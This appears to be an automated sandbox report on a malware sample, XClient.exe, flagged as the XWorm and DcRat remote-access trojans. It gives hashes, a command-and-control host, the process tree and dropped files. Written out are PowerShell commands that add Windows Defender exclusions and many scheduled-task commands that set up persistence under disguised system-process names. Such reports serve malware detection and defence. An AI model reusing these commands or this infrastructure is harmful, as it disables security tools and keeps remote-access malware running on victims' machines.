Analysis
max time kernel: 147s
max time network: 153s
platform: windows11-21h2_x64
resource: win11-20240508-en
resource tags: arch:x64, arch:x86, image:win11-20240508-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 31-05-2024 04:07
Behavioral task: behavioral1
Sample: XClient.exe
Resource: win11-20240508-en
General
Target: XClient.exe
Size: 72KB
MD5: 886abac8e29288624c9cfc55dfc7d940
SHA1: 35cf22bb640bdb7a641ce6dbb8efec00da592b0e
SHA256: 8fcf527c18bd78b4fb4a7933eaba050826ce621f70ec6660da71607cf768f381
SHA512: 6ae6939341612bedd320d276285b9a07884aa3ae941aac90a404d50bc696336cc278e2eee32c0a8f43782c9522a86ff1a0e89cd48fdaaf2040a074a65c0036f7
SSDEEP: 1536:tsWNT4wTOYvKz3Gvdr4u+bXcpqmQOVXoGe6Yp2hnz/ORgRW96exN:tsa4sy7Gvd3+bXcpK2bOuWv
Malware Config
Extracted
xworm
loss-winners.gl.at.ply.gg:61007
Install_directory: %AppData%
install_file: Expensive 3.1.exe
Signatures
-
DcRat 49 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Processes:
schtasks.exe (pid): 1376, 560, 4932, 2504, 1668, 2500, 2828, 2472, 3812, 2364, 1312, 3748, 3388, 3560, 2116, 2200, 640, 1196, 4008, 3948, 572, 1028, 3716, 3516, 2252, 5112, 1180, 2624, 4960, 5096, 4688, 1580, 2012, 72, 3592, 1512, 3640, 3276, 1864, 3536, 5060, 1748, 4536, 1456, 3084, 1892, 1904, 3764
powershell.exe (pid): 4392
Detect Xworm Payload 1 IoCs
Processes:
resource | yara_rule
behavioral1/memory/568-1-0x0000000000C50000-0x0000000000C68000-memory.dmp | family_xworm
Process spawned unexpected child process 48 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description (identical for all 48 rows): Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
Remaining values of each row, under the column headings "pid pid_target process target process":
3536 4192 schtasks.exe
3812 4192 schtasks.exe
2012 4192 schtasks.exe
1904 4192 schtasks.exe
4932 4192 schtasks.exe
640 4192 schtasks.exe
1748 4192 schtasks.exe
3716 4192 schtasks.exe
72 4192 schtasks.exe
2116 4192 schtasks.exe
5060 4192 schtasks.exe
2504 4192 schtasks.exe
1456 4192 schtasks.exe
3388 4192 schtasks.exe
4536 4192 schtasks.exe
3948 4192 schtasks.exe
2252 4192 schtasks.exe
1668 4192 schtasks.exe
3640 4192 schtasks.exe
3276 4192 schtasks.exe
2500 4192 schtasks.exe
2200 4192 schtasks.exe
3592 4192 schtasks.exe
2828 4192 schtasks.exe
3764 4192 schtasks.exe
2472 4192 schtasks.exe
1512 4192 schtasks.exe
4688 4192 schtasks.exe
1376 4192 schtasks.exe
5112 4192 schtasks.exe
3560 4192 schtasks.exe
1196 4192 schtasks.exe
1864 4192 schtasks.exe
1180 4192 schtasks.exe
1312 4192 schtasks.exe
572 4192 schtasks.exe
2624 4192 schtasks.exe
3516 4192 schtasks.exe
3748 4192 schtasks.exe
560 4192 schtasks.exe
3084 4192 schtasks.exe
4960 4192 schtasks.exe
1028 4192 schtasks.exe
4008 4192 schtasks.exe
2364 4192 schtasks.exe
1892 4192 schtasks.exe
5096 4192 schtasks.exe
1580 4192 schtasks.exe
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\uliqxd.exe | dcrat
C:\SavesDllcommon\fontsaves.exe | dcrat
behavioral1/memory/4000-72-0x00000000007D0000-0x0000000000902000-memory.dmp | dcrat
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exe (pid): 4392, 2452, 4148, 1768
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
Processes:
pid | process
5068 | uliqxd.exe
4000 | fontsaves.exe
3428 | System.exe
1284 | Meatspin_FULL.exe
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Microsoft\Windows\CurrentVersion\Run\Expensive 3.1 = "C:\\Users\\Admin\\AppData\\Roaming\\Expensive 3.1.exe" | XClient.exe
Drops file in System32 directory 2 IoCs
Processes:
description | ioc | process
File created | C:\Windows\SysWOW64\SMI\Manifests\unsecapp.exe | fontsaves.exe
File created | C:\Windows\SysWOW64\SMI\Manifests\29c1c3cc0f7685 | fontsaves.exe
Drops file in Program Files directory 8 IoCs
Processes:
description | ioc | process
File created | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe | fontsaves.exe
File created | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\7a0fd90576e088 | fontsaves.exe
File created | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe | fontsaves.exe
File created | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\7a0fd90576e088 | fontsaves.exe
File created | C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe | fontsaves.exe
File created | C:\Program Files\Windows NT\TableTextService\en-US\5b884080fd4f94 | fontsaves.exe
File created | C:\Program Files\Windows Media Player\Visualizations\explorer.exe | fontsaves.exe
File created | C:\Program Files\Windows Media Player\Visualizations\7a0fd90576e088 | fontsaves.exe
Drops file in Windows directory 8 IoCs
Processes:
description | ioc | process
File created | C:\Windows\Migration\WTR\5940a34987c991 | fontsaves.exe
File created | C:\Windows\addins\csrss.exe | fontsaves.exe
File created | C:\Windows\addins\886983d96e3d3e | fontsaves.exe
File created | C:\Windows\ImmersiveControlPanel\pris\dllhost.exe | fontsaves.exe
File created | C:\Windows\ImmersiveControlPanel\pris\5940a34987c991 | fontsaves.exe
File created | C:\Windows\ServiceState\WinHttpAutoProxySvc\Data\winlogon.exe | fontsaves.exe
File created | C:\Windows\Migration\WTR\dllhost.exe | fontsaves.exe
File opened for modification | C:\Windows\Migration\WTR\dllhost.exe | fontsaves.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 48 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exe (pid): 4932, 4008, 2364, 2828, 3764, 2116, 2504, 1456, 4536, 3948, 3640, 1512, 3560, 1864, 3084, 5096, 1580, 2252, 2200, 2472, 1312, 3748, 72, 3276, 560, 5060, 1180, 3592, 1376, 3812, 2012, 3716, 3388, 1668, 2500, 1196, 4960, 1892, 3516, 1028, 3536, 1904, 640, 1748, 4688, 5112, 572, 2624
Modifies registry class 2 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings | uliqxd.exe
Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings | fontsaves.exe
Suspicious behavior: EnumeratesProcesses 30 IoCs
Processes:
powershell.exe (pid): 4392, 4392, 2452, 2452, 4148, 4148, 1768, 1768
XClient.exe (pid): 568, 568
fontsaves.exe (pid): 4000, 4000, 4000, 4000, 4000, 4000, 4000, 4000, 4000, 4000, 4000
System.exe (pid): 3428, 3428, 3428, 3428, 3428, 3428, 3428, 3428, 3428
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
System.exe (pid): 3428
Suspicious use of AdjustPrivilegeToken 10 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 568 | XClient.exe
Token: SeDebugPrivilege | 4392 | powershell.exe
Token: SeDebugPrivilege | 2452 | powershell.exe
Token: SeDebugPrivilege | 4148 | powershell.exe
Token: SeDebugPrivilege | 1768 | powershell.exe
Token: SeDebugPrivilege | 568 | XClient.exe
Token: SeDebugPrivilege | 4000 | fontsaves.exe
Token: SeDebugPrivilege | 3428 | System.exe
Token: 33 | 1512 | AUDIODG.EXE
Token: SeIncBasePriorityPrivilege | 1512 | AUDIODG.EXE
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
XClient.exe (pid): 568
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
description | pid | process | target process
PID 568 wrote to memory of 4392 | 568 | XClient.exe | powershell.exe
PID 568 wrote to memory of 4392 | 568 | XClient.exe | powershell.exe
PID 568 wrote to memory of 2452 | 568 | XClient.exe | powershell.exe
PID 568 wrote to memory of 2452 | 568 | XClient.exe | powershell.exe
PID 568 wrote to memory of 4148 | 568 | XClient.exe | powershell.exe
PID 568 wrote to memory of 4148 | 568 | XClient.exe | powershell.exe
PID 568 wrote to memory of 1768 | 568 | XClient.exe | powershell.exe
PID 568 wrote to memory of 1768 | 568 | XClient.exe | powershell.exe
PID 568 wrote to memory of 5068 | 568 | XClient.exe | uliqxd.exe
PID 568 wrote to memory of 5068 | 568 | XClient.exe | uliqxd.exe
PID 568 wrote to memory of 5068 | 568 | XClient.exe | uliqxd.exe
PID 5068 wrote to memory of 5088 | 5068 | uliqxd.exe | WScript.exe
PID 5068 wrote to memory of 5088 | 5068 | uliqxd.exe | WScript.exe
PID 5068 wrote to memory of 5088 | 5068 | uliqxd.exe | WScript.exe
PID 5088 wrote to memory of 4360 | 5088 | WScript.exe | cmd.exe
PID 5088 wrote to memory of 4360 | 5088 | WScript.exe | cmd.exe
PID 5088 wrote to memory of 4360 | 5088 | WScript.exe | cmd.exe
PID 4360 wrote to memory of 4000 | 4360 | cmd.exe | fontsaves.exe
PID 4360 wrote to memory of 4000 | 4360 | cmd.exe | fontsaves.exe
PID 4000 wrote to memory of 3552 | 4000 | fontsaves.exe | cmd.exe
PID 4000 wrote to memory of 3552 | 4000 | fontsaves.exe | cmd.exe
PID 3552 wrote to memory of 4920 | 3552 | cmd.exe | w32tm.exe
PID 3552 wrote to memory of 4920 | 3552 | cmd.exe | w32tm.exe
PID 3552 wrote to memory of 3428 | 3552 | cmd.exe | System.exe
PID 3552 wrote to memory of 3428 | 3552 | cmd.exe | System.exe
PID 3428 wrote to memory of 1284 | 3428 | System.exe | Meatspin_FULL.exe
PID 3428 wrote to memory of 1284 | 3428 | System.exe | Meatspin_FULL.exe
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe [tree depth 1]
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:568 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe [tree depth 2]
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
- DcRat
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe [tree depth 2]
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe [tree depth 2]
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Expensive 3.1.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4148 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe [tree depth 2]
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Expensive 3.1.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1768 -
C:\Users\Admin\AppData\Local\Temp\uliqxd.exe [tree depth 2]
"C:\Users\Admin\AppData\Local\Temp\uliqxd.exe"
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5068 -
C:\Windows\SysWOW64\WScript.exe [tree depth 3]
"C:\Windows\System32\WScript.exe" "C:\SavesDllcommon\gdNhr8l.vbe"
- Suspicious use of WriteProcessMemory
PID:5088 -
C:\Windows\SysWOW64\cmd.exe [tree depth 4]
C:\Windows\system32\cmd.exe /c ""C:\SavesDllcommon\BRvogp3keJwY6M0FyR4uWbtTK.bat" "
- Suspicious use of WriteProcessMemory
PID:4360 -
C:\SavesDllcommon\fontsaves.exe [tree depth 5]
"C:\SavesDllcommon\fontsaves.exe"
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4000 -
C:\Windows\System32\cmd.exe [tree depth 6]
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6py5WUoJqb.bat"
- Suspicious use of WriteProcessMemory
PID:3552 -
C:\Windows\system32\w32tm.exe [tree depth 7]
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
PID:4920
-
C:\SavesDllcommon\System.exe [tree depth 7]
"C:\SavesDllcommon\System.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3428 -
C:\Users\Admin\AppData\Local\Temp\Meatspin_FULL.exe [tree depth 8]
"C:\Users\Admin\AppData\Local\Temp\Meatspin_FULL.exe"
- Executes dropped EXE
PID:1284
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Windows\Migration\WTR\dllhost.exe'" /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3536
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\dllhost.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3812
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Windows\Migration\WTR\dllhost.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2012
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\SavesDllcommon\winlogon.exe'" /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1904
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\SavesDllcommon\winlogon.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4932
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\SavesDllcommon\winlogon.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:640
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\wininit.exe'" /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1748
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\Default User\wininit.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3716
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\wininit.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:72
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe'" /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2116
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5060
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2504
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\spoolsv.exe'" /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1456
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Users\All Users\spoolsv.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3388
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\spoolsv.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4536
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\unsecapp.exe'" /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3948
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\Default User\unsecapp.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2252
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\unsecapp.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1668
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\SavesDllcommon\StartMenuExperienceHost.exe'" /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3640
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\SavesDllcommon\StartMenuExperienceHost.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3276
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\SavesDllcommon\StartMenuExperienceHost.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2500
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe'" /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2200
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3592
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2828
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3764
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2472
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1512
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4688
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1376
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5112
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Windows\addins\csrss.exe'" /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3560
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\addins\csrss.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1196
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Windows\addins\csrss.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1864
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Windows\ImmersiveControlPanel\pris\dllhost.exe'" /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1180
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\ImmersiveControlPanel\pris\dllhost.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1312
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Windows\ImmersiveControlPanel\pris\dllhost.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:572
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\SavesDllcommon\System.exe'" /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2624
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\SavesDllcommon\System.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3516
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\SavesDllcommon\System.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3748
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "XClientX" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\XClient.exe'" /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:560
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "XClient" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\XClient.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3084
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "XClientX" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\XClient.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4960
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Media Player\Visualizations\explorer.exe'" /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1028
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\Visualizations\explorer.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4008
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Media Player\Visualizations\explorer.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2364
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 14 /tr "'C:\Windows\SysWOW64\SMI\Manifests\unsecapp.exe'" /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1892
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Windows\SysWOW64\SMI\Manifests\unsecapp.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5096
-
C:\Windows\system32\schtasks.exe [tree depth 1]
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 7 /tr "'C:\Windows\SysWOW64\SMI\Manifests\unsecapp.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1580
-
C:\Windows\system32\AUDIODG.EXE [tree depth 1]
C:\Windows\system32\AUDIODG.EXE 0x00000000000004C8 0x00000000000004BC
- Suspicious use of AdjustPrivilegeToken
PID:1512
Network
MITRE ATT&CK Enterprise v15
Downloads
-
C:\SavesDllcommon\BRvogp3keJwY6M0FyR4uWbtTK.bat
Filesize: 33B
-
C:\SavesDllcommon\fontsaves.exe
Filesize: 1.2MB
-
C:\SavesDllcommon\gdNhr8l.vbe
Filesize: 216B
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize: 2KB
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 944B
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 944B
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 944B
-
C:\Users\Admin\AppData\Local\Temp\6py5WUoJqb.bat
Filesize: 193B
-
C:\Users\Admin\AppData\Local\Temp\Meatspin_FULL.exe
Filesize: 3.8MB
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p4uidhoz.dzr.ps1
Filesize: 60B
-
C:\Users\Admin\AppData\Local\Temp\uliqxd.exe
Filesize: 1.5MB